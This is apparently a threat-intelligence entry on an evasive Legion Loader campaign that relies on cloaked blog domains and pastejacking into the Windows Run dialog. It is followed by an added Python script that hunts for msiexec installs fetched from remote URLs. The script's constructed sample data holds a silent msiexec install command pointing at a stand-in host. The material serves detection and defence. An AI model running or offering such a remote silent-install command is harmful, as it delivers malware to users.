216.73.216.226

Evasive Campaign Pushing Legion Loader Malware

Published 11/04/2025 09:01 · Modified 11/04/2025 10:25


Essential information

Published
11/04/2025 09:01
Modified
11/04/2025 10:25
Tags
2025-04-11, affiliate links, clipboard hijacking, cloaking, pastejacking
Related entities
83 observables, 6 techniques (mitre), 1 malware

Description

A highly evasive web campaign is tricking users into running MSI files that contain Legion Loader malware. The campaign combines several evasion strategies: captcha pages, sites disguised as blogs, and dynamically generated download URLs. The malicious page script instructs the victim to paste clipboard content into a Run window; the pasted command downloads and displays the MSI file. Victims reach the malicious download pages through TDS traffic with short-lived URL parameters; when a URL is accessed without valid parameters, it serves benign content instead (cloaking). The campaign's infrastructure comprises 76 domains resolving to a single IP address, all disguised as blog sites.
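The paste-into-Run step described above leaves two artifacts a responder can hunt for: a process-creation event for msiexec.exe whose parent is explorer.exe (how a command typed into the Run dialog surfaces) and whose command line points at a remote package URL, and the RunMRU registry key under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, where Windows records Run-dialog history as lettered values (each ending in a literal "\1") ordered by the MRUList value. The script below is an added example, not code from the report or from the campaign's analysts; the sample events, the RunMRU values, the `.invalid` domain and the `msiexec /i https://... /qn` command line are all constructed here to illustrate the pattern, since the page does not reproduce the actual pasted command.

```python
"""Hunt for the Run-dialog -> msiexec-from-URL pattern in exported process-creation
events and in RunMRU registry values. Added example; all sample data is constructed."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Matches an http(s) URL inside a command line. The query string is kept on purpose:
# the campaign relies on short-lived URL parameters, so it is worth preserving for triage.
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)


@dataclass
class ProcEvent:
    """Minimal shape of a Sysmon Event ID 1 / Windows 4688 process-creation record."""
    image: str
    command_line: str
    parent_image: str


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path (handles forward or back slashes)."""
    return path.lower().replace("/", "\\").rsplit("\\", 1)[-1]


def run_dialog_msiexec_url(ev: ProcEvent) -> Optional[str]:
    """Return the remote package URL if msiexec.exe was spawned by explorer.exe (the
    parent seen for commands typed into the Run dialog) with an http(s) path; else None.
    Assumption: Run-dialog launches appear with explorer.exe as the parent image."""
    if _basename(ev.image) != "msiexec.exe" or _basename(ev.parent_image) != "explorer.exe":
        return None
    m = URL_RE.search(ev.command_line)
    return m.group(0) if m else None


def hunt_events(events: List[ProcEvent]) -> List[str]:
    """Collect every remote MSI URL flagged across a batch of events."""
    return [u for u in (run_dialog_msiexec_url(ev) for ev in events) if u]


def runmru_commands(values: Dict[str, str]) -> List[str]:
    """Order RunMRU entries most-recent-first using MRUList and strip the trailing '\\1'
    that Windows appends to each stored command."""
    out = []
    for letter in values.get("MRUList", ""):
        data = values.get(letter)
        if data is None:
            continue
        if data.endswith("\\1"):
            data = data[:-2]
        out.append(data)
    return out


def runmru_remote_installs(values: Dict[str, str]) -> List[str]:
    """RunMRU commands that invoke msiexec with a remote package URL."""
    hits = []
    for cmd in runmru_commands(values):
        tokens = cmd.split()
        if tokens and tokens[0].lower() in ("msiexec", "msiexec.exe") and URL_RE.search(cmd):
            hits.append(cmd)
    return hits


# Constructed sample data (not from the report): one benign local install launched by
# double-clicking an MSI, one pasted Run-dialog command fetching an MSI from a cloaked
# URL with a short-lived parameter, and one Windows Installer service start.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\msiexec.exe",
              r'"C:\Windows\System32\msiexec.exe" /i "C:\Users\alice\Downloads\setup.msi"',
              r"C:\Windows\explorer.exe"),
    ProcEvent(r"C:\Windows\System32\msiexec.exe",
              r"msiexec /i https://blog-example.invalid/dl/?t=8f3a1c /qn",
              r"C:\Windows\explorer.exe"),
    ProcEvent(r"C:\Windows\System32\msiexec.exe",
              r"C:\Windows\system32\msiexec.exe /V",
              r"C:\Windows\System32\services.exe"),
]

# Constructed RunMRU export: MRUList "cab" means value c is the most recent entry.
SAMPLE_RUNMRU = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "cmd\\1",
    "c": "msiexec /i https://blog-example.invalid/dl/?t=8f3a1c /qn\\1",
}

if __name__ == "__main__":
    for url in hunt_events(SAMPLE_EVENTS):
        print("process event: msiexec from Run dialog fetching", url)
    for cmd in runmru_remote_installs(SAMPLE_RUNMRU):
        print("RunMRU history: ", cmd)
```

Corroborating a flagged process event against RunMRU ties the download to a user-typed Run command rather than a script or scheduled task, which is the distinguishing feature of the pastejacking step; the URL's query parameter is what to submit for replay, since the page notes the same URL cloaks to benign content once the parameter expires.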

External references